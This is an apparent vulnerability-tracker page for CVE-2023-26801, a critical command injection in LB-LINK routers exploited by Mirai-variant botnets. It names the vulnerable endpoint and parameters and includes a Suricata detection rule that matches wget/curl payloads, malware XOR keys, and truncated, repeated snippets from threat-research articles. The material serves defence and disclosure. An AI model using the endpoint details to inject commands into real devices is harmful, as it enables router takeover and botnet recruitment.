CVE-2023-26801
published 2023-03-26CVE-2023-26801: LB-LINK BL-AC1900_2.0 v1.0.1, LB-LINK BL-WR9000 v2.4.9, LB-LINK BL-X26 v1.2.5, and LB-LINK BL-LTE300 v1.0.8 were discovered to contain a command injection…
PriorityP185critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWVulnCheck KEV
Exploited in the wild
EPSS
69.66%
99.3th percentile
LB-LINK BL-AC1900_2.0 v1.0.1, LB-LINK BL-WR9000 v2.4.9, LB-LINK BL-X26 v1.2.5, and LB-LINK BL-LTE300 v1.0.8 were discovered to contain a command injection vulnerability via the mac, time1, and time2 parameters at /goform/set_LimitClient_cfg.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| lb-link | bl-ac1900_firmware | — | — |
| lb-link | bl-lte300_firmware | — | — |
| lb-link | bl-wr9000_firmware | — | — |
| lb-link | bl-x26_firmware | — | — |
Detection & IOCsextracted from sources · hover to see the quote
snort
alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT LB-Link Command Injection Attempt (CVE-2023-26801)"; flow:established,to_server; http.method; content:"POST"; http.uri; bsize:27; content:"/goform/set_LimitClient_cfg"; http.request_body; content:"time1="; startswith; fast_pattern; content:"&time2"; distance:0; content:"&mac="; distance:0; pcre:"/^[^&]*?(?:(wget|curl))/R"; reference:url,unit42.paloaltonetworks.com/mirai-variant-iz1h9; reference:cve,2023-26801; classtype:attempted-admin; sid:2048548; rev:3;)
bytes↗
XOR key 0xBAADF00D (bytewise: 0xBA ^ 0xAD ^ 0xF0 ^ 0x0D = 0xEA)
bytes↗
Telnet/SSH credentials XOR key 0x54
- →Exploit traffic targets HTTP POST to /goform/set_LimitClient_cfg with parameters time1, time2, and mac; payload contains wget or curl commands for dropper download (regex: /^[^&]*?(?:(wget|curl))/R in body) ↗
- →URI length for exploit request is exactly 27 bytes (/goform/set_LimitClient_cfg); use bsize:27 in URI matching to reduce false positives ↗
- →Threat Prevention signatures 93386, 93718, 93721, 93722 cover the exploit and malware activity associated with this campaign ↗
- →The botnet uses custom UPX packing with unique signatures; standard UPX detection may miss samples — look for UPX headers with non-standard magic bytes ↗
- ·The Tenda vulnerability exploit function in this IZ1H9 sample contains a bug: it downloads tenda.sh but executes netlog.sh, meaning that particular exploit chain will not work as intended ↗
- ·The reported hash artifact (692a5d099e37cd94923ea2) appears truncated in the source document and may be incomplete; verify against full hash before using for detection ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-c5pj-m2vw-68wh: LB-LINK BL-AC1900_2
ghsa_unreviewed·2023-03-26
CVE-2023-26801 [CRITICAL] CWE-77 GHSA-c5pj-m2vw-68wh: LB-LINK BL-AC1900_2
LB-LINK BL-AC1900_2.0 v1.0.1, LB-LINK BL-WR9000 v2.4.9, LB-LINK BL-X26 v1.2.5, and LB-LINK BL-LTE300 v1.0.8 were discovered to contain a command injection vulnerability via the mac, time1, and time2 parameters at /goform/set_LimitClient_cfg.
VulnCheck
lb-link bl-lte300_firmware Improper Neutralization of Special Elements used in a Command ('Command Injection')
vulncheck·2023·CVSS 9.8
CVE-2023-26801 [CRITICAL] lb-link bl-lte300_firmware Improper Neutralization of Special Elements used in a Command ('Command Injection')
lb-link bl-lte300_firmware Improper Neutralization of Special Elements used in a Command ('Command Injection')
LB-LINK BL-AC1900_2.0 v1.0.1, LB-LINK BL-WR9000 v2.4.9, LB-LINK BL-X26 v1.2.5, and LB-LINK BL-LTE300 v1.0.8 were discovered to contain a command injection vulnerability via the mac, time1, and time2 parameters at /goform/set_LimitClient_cfg.
Affected: lb-link bl-lte300_firmware
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.fortiguard.com/outbreak-alert/router-malware-attack; https://unit42.paloaltonetworks.com/mirai-variant-iz1h9/; https://www.akamai.com/blog/security-research/cve-2023-26801-exploited-spreading-mirai-botnet; https:/
Suricata
ET EXPLOIT LB-Link Command Injection Attempt (CVE-2023-26801)
suricata·2023-10-12·CVSS 9.8
CVE-2023-26801 [CRITICAL] ET EXPLOIT LB-Link Command Injection Attempt (CVE-2023-26801)
ET EXPLOIT LB-Link Command Injection Attempt (CVE-2023-26801)
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT LB-Link Command Injection Attempt (CVE-2023-26801)"; flow:established,to_server; http.method; content:"POST"; http.uri; bsize:27; content:"/goform/set_LimitClient_cfg"; http.request_body; content:"time1="; startswith; fast_pattern; content:"&time2"; distance:0; content:"&mac="; distance:0; pcre:"/^[^&]*?(?:(wget|curl))/R"; reference:url,unit42.paloaltonetworks.com/mirai-variant-iz1h9; reference:cve,2023-26801; classtype:attempted-admin; sid:2048548; rev:3; metadata:attack_target IoT, created_at 2023_10_12, cve CVE_2023_26801, deployment Perimeter, performance_impact Low, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus
No public exploits indexed.
Sans Isc
What do Ports Hear When Nobody's Listening? An Assessment of Automated Cybercrime [Guest Diary], (Wed, Jun 24th)
blogs_sans_isc·2026-06-25
CVE-2016-20017 What do Ports Hear When Nobody's Listening? An Assessment of Automated Cybercrime [Guest Diary], (Wed, Jun 24th)
What do Ports Hear When Nobody's Listening? An Assessment of Automated Cybercrime [Guest Diary]
Published: 2026-06-24. Last Updated: 2026-06-25 00:39:08 UTC
by Nicole Phillips, SANS.edu BACS Student (Version: 1)
0 comment(s)
[This is a Guest Diary by Nicole Phillips, an ISC intern as part of the SANS.edu BACS program]
"I was just sitting here enjoying the company. Plants got a lot to say, if you take the time to listen."
— Eeyore, Winnie the Pooh
Introduction: Listening to the Static
Setting up and contributing to the DShield honeypot project [1] as an ISC intern is a meaningful part of the BACS program at SANS [2]. Over the last several months I've been thrilled to observe real-time SSH/Telnet activity, check every new file hash and TTY log and hunt for unique http requests. That sa
Trendmicro
RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
blogs_trendmicro·2025-10-09·CVSS 8.8
[HIGH] RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
Cyber Threats
## RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
Trend™ Research and ZDI Threat Hunters have identified a large-scale RondoDox botnet campaign exploiting over 50 vulnerabilities across more than 30 vendors, including flaws first seen in Pwn2Own contests.
By: Deep Patel, Ashish Verma, Simon Dulude, Peter Girnus Oct 09, 2025 Read time: ( words)
Save to Folio
Trend customers can be reassured that they have been protected against vulnerabilities like CVE-2023-1389 since it was disclosed at Pwn2Own.
Below is the timeline showing key events in the RondoDox vulnerability, from discovery to exploitation:
December 6, 2022: Tri Dang and Bien Pham (@bienpnn) from Qrious Secure exploit the WAN interface of TP-Link AX1800 at Pwn2Own Toronto 2022 .
Januar
Trendmicro
RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
blogs_trendmicro·2025-10-09·CVSS 8.8
[HIGH] RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
Cyber Threats
## RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
The Trend Zero Day Initiative™ (ZDI) and Trend™ Research teams have identified a large-scale RondoDox botnet campaign exploiting over 50 vulnerabilities across more than 30 vendors, including flaws first seen in Pwn2Own contests.
By: Deep Patel, Ashish Verma, Simon Dulude, Peter Girnus Oct 09, 2025 Read time: ( words)
Save to Folio
Trend customers can be reassured that they have been protected against vulnerabilities like CVE-2023-1389 since it was disclosed at Pwn2Own.
Below is the timeline showing key events in the RondoDox vulnerability, from discovery to exploitation:
December 6, 2022: Tri Dang and Bien Pham (@bienpnn) from Qrious Secure exploit the WAN interface of TP-Link AX1800 at Pwn2Ow
Trendmicro
RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
blogs_trendmicro·2025-10-09
RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
Cyber Threats
# RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
Trend™ Research and ZDI Threat Hunters have identified a large-scale RondoDox botnet campaign exploiting over 50 vulnerabilities across more than 30 vendors, including flaws first seen in Pwn2Own contests.
By: Deep Patel, Ashish Verma, Simon Dulude, Peter Girnus
2025/10/09
Read time: ( words)
Save to Folio
Key takeaways
- The campaign exposes organizations to the risks of data exfiltration, persistent network compromise, and operational disruption for organizations with exposed infrastructure.
- Organizations operating internet-facing network devices are at heightened risk. Active exploitation has been observed globally since mid-2025, with several CVEs now included in CISA’s Known Exploited Vul
Trendmicro
RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
blogs_trendmicro·2025-10-09·CVSS 8.8
[HIGH] RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
Cyber Threats
## RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
Trend™ Research and ZDI Threat Hunters have identified a large-scale RondoDox botnet campaign exploiting over 50 vulnerabilities across more than 30 vendors, including flaws first seen in Pwn2Own contests.
By: Deep Patel, Ashish Verma, Simon Dulude, Peter Girnus 2025/10/09 Read time: ( words)
Save to Folio
Trend customers can be reassured that they have been protected against vulnerabilities like CVE-2023-1389 since it was disclosed at Pwn2Own.
Below is the timeline showing key events in the RondoDox vulnerability, from discovery to exploitation:
December 6, 2022: Tri Dang and Bien Pham (@bienpnn) from Qrious Secure exploit the WAN interface of TP-Link AX1800 at Pwn2Own Toronto 2022 .
January
Trendmicro
RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
blogs_trendmicro·2025-10-09·CVSS 8.8
[HIGH] RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
Ciberamenazas
## RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
The Trend Zero Day Initiative™ (ZDI) and Trend™ Research teams have identified a large-scale RondoDox botnet campaign exploiting over 50 vulnerabilities across more than 30 vendors, including flaws first seen in Pwn2Own contests.
By: Deep Patel, Ashish Verma, Simon Dulude, Peter Girnus Oct 09, 2025 Read time: ( words)
Save to Folio
Trend customers can be reassured that they have been protected against vulnerabilities like CVE-2023-1389 since it was disclosed at Pwn2Own.
Below is the timeline showing key events in the RondoDox vulnerability, from discovery to exploitation:
December 6, 2022: Tri Dang and Bien Pham (@bienpnn) from Qrious Secure exploit the WAN interface of TP-Link AX1800 at Pwn2Ow
Bleepingcomputer
RondoDox botnet targets 56 n-day flaws in worldwide attacks
blogs_bleepingcomputer·2025-10-09·CVSS 8.8
[HIGH] RondoDox botnet targets 56 n-day flaws in worldwide attacks
## RondoDox botnet targets 56 n-day flaws in worldwide attacks
## Bill Toulas
A new large-scale botnet called RondoDox is targeting 56 vulnerabilities in more than 30 distinct devices, including flaws first disclosed during Pwn2Own hacking competitions.
The attacker focuses on a wide range of exposed devices, including DVRs, NVRs, CCTV systems, and web servers and have been active since June.
The RondoDox botnet leverages what Trend Micro researchers call an “exploit shotgun” strategy, where numerous exploits are used simultaneously to maximize the infections, even if the activity is very noisy.
Since FortiGuard Labs discovered RondoDox , the botnet appears to have expanded the list of exploited vulnerabilities, which included CVE-2024-3721 and CVE-2024-12856.
## Mass n-day exploitat
Bleepingcomputer
New Aquabotv3 botnet malware targets Mitel command injection flaw
blogs_bleepingcomputer·2025-01-29·CVSS 7.2
CVE-2024-41710 [HIGH] New Aquabotv3 botnet malware targets Mitel command injection flaw
## New Aquabotv3 botnet malware targets Mitel command injection flaw
## Bill Toulas
A new variant of the Mirai-based botnet malware Aquabot has been observed actively exploiting CVE-2024-41710, a command injection vulnerability in Mitel SIP phones.
The activity was discovered by Akamai's Security Intelligence and Response Team (SIRT), who reports that this is the third variant of Aquabot that falls under their radar.
The malware family was introduced in 2023, and a second version that added persistence mechanisms was released later. The third variant, 'Aquabotv3,' introduced a system that detects termination signals and sends the info to the command-and-control (C2) server.
Akamai comments that Aquabotv3's mechanism to report back kill attempts is unusual for botnets and may have been
Bleepingcomputer
New Mirai botnet targets industrial routers with zero-day exploits
blogs_bleepingcomputer·2025-01-07·CVSS 8.8
CVE-2024-12856 [HIGH] New Mirai botnet targets industrial routers with zero-day exploits
## New Mirai botnet targets industrial routers with zero-day exploits
## Bill Toulas
A relatively new Mirai-based botnet has been growing in sophistication and is now leveraging zero-day exploits for security flaws in industrial routers and smart home devices.
Exploitation of previously unknown vulnerabilities started in November 2024, according to Chainxin X Lab researchers who monitored the botnet's development and attacks.
One of the security issues is CVE-2024-12856, a vulnerability in Four-Faith industrial routers that VulnCheck discovered in late December but noticed efforts to exploit it around December 20.
to leverage zero-day exploits has been leveraging a zero-day exploit for CVE-2024-12856, impacting Four-Faith routers, alongside other custom exploits for flaws in Neterbit
Unit42
Old Wine in the New Bottle: Mirai Variant Targets Multiple IoT Devices
blogs_unit42·2023-05-25·CVSS 9.8
CVE-2023-26801 [CRITICAL] Old Wine in the New Bottle: Mirai Variant Targets Multiple IoT Devices
Threat Research Center
Trend Reports
Vulnerabilities
## Old Wine in the New Bottle: Mirai Variant Targets Multiple IoT Devices
Chao Lei
Zhibin Zhang
Cecilia Hu
Published: May 25, 2023
Trend Reports
Vulnerabilities
CVE-2023-26801
CVE-2023-26802
CVE-2023-27076
IoT
IZ1H9
Mirai variant
## Executive Summary
On April 10, Unit 42 researchers observed a Mirai variant called IZ1H9, which used several vulnerabilities to spread itself. The threat actors use the following vulnerabilities to target exposed servers and networking devices running Linux:
CVE-2023-27076 : Tenda G103 command injection vulnerability
CVE-2023-26801 : LB-Link command injection vulnerability
CVE-2023-26802 : DCN DCBI-Netlog-LAB remote code execution vulnerability
Zyxel remote code execution vulnerabilit
Unit42
Old Wine in the New Bottle: Mirai Variant Targets Multiple IoT Devices
blogs_unit42·2023-05-25·CVSS 9.8
CVE-2023-27076 [CRITICAL] Old Wine in the New Bottle: Mirai Variant Targets Multiple IoT Devices
## Executive Summary
On April 10, Unit 42 researchers observed a Mirai variant called IZ1H9, which used several vulnerabilities to spread itself. The threat actors use the following vulnerabilities to target exposed servers and networking devices running Linux:
- CVE-2023-27076: Tenda G103 command injection vulnerability
- CVE-2023-26801: LB-Link command injection vulnerability
- CVE-2023-26802: DCN DCBI-Netlog-LAB remote code execution vulnerability
- Zyxel remote code execution vulnerability
Compromised devices can be fully controlled by attackers and become a part of the botnet. Those devices can be used to conduct further attacks, such as distributed denial-of-service (DDoS) attacks.
Palo Alto Networks Next Generation Firewall customers receive protections through Cloud-Delivered S
https://github.com/winmt/my-vuls/tree/main/LB-LINK%20BL-AC1900%2C%20BL-WR9000%2C%20BL-X26%20and%20BL-LTE300%20Wireless%20Routershttps://www.akamai.com/blog/security-research/cve-2023-26801-exploited-spreading-mirai-botnethttps://github.com/winmt/my-vuls/tree/main/LB-LINK%20BL-AC1900%2C%20BL-WR9000%2C%20BL-X26%20and%20BL-LTE300%20Wireless%20Routers
2023-03-26
Published
Exploited in the wild